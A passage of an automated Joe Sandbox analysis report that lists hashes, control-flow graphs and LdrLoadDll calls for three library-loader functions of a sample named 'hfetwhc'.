                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: c586a7f7552cfa1264bdfd6446e6af8fa62c48e7815e9ce7a11aec56ea3c76bc
                                                                                                                                      • Instruction ID: 435834e2c39daa923cd5fadee32533bbbd7b41fdf8ed414aea64f9f221a811b8
                                                                                                                                      • Opcode Fuzzy Hash: c586a7f7552cfa1264bdfd6446e6af8fa62c48e7815e9ce7a11aec56ea3c76bc
                                                                                                                                      • Instruction Fuzzy Hash: 4B01AD71708100EBD7209A548B8DBA93720EB40714F2080B7E5467A1C2C9F8AA47BF6B
                                                                                                                                      Function 004029AE Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 116 4029ae-4029e1 call 401232 124 4029e5-4029f3 LdrLoadDll 116->124 125 4029f5 124->125 126 4029fc-402a49 call 401232 124->126 125->126
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 5a071c98681e7d0b87df0d8d00c5fcc42721b749d79cd25973cd75420e8f5f16
                                                                                                                                      • Instruction ID: 5d0c9aa573ddbf1b5d1aef5dd4ea0e86145ae8e07b52c401b3230758a671744f
                                                                                                                                      • Opcode Fuzzy Hash: 5a071c98681e7d0b87df0d8d00c5fcc42721b749d79cd25973cd75420e8f5f16
                                                                                                                                      • Instruction Fuzzy Hash: 85018471708104E7DB20AA849B49BAD7320AB40714F3080B7B5437A1C1D9FC9A57BF6F
                                                                                                                                      Function 004029B9 Relevance: 1.5, APIs: 1, Instructions: 45libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 138 4029b9-4029e0 140 4029e5-4029f3 LdrLoadDll 138->140 141 4029f5 140->141 142 4029fc-402a49 call 401232 140->142 141->142
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: d8adf41a1b4864ea6d1a655086c93c2f4e0cb93a71ccb4490598b37b5feb4ad6
                                                                                                                                      • Instruction ID: 680402693e7b9acc8b3619b38c705919dffa9aa4bf8e7b0a6659c80f6f187f6c
                                                                                                                                      • Opcode Fuzzy Hash: d8adf41a1b4864ea6d1a655086c93c2f4e0cb93a71ccb4490598b37b5feb4ad6
                                                                                                                                      • Instruction Fuzzy Hash: B8012831308244D7C721D6649A4DB6EBB60AF41714F2440EBD5837A0C2C9B89407FF5B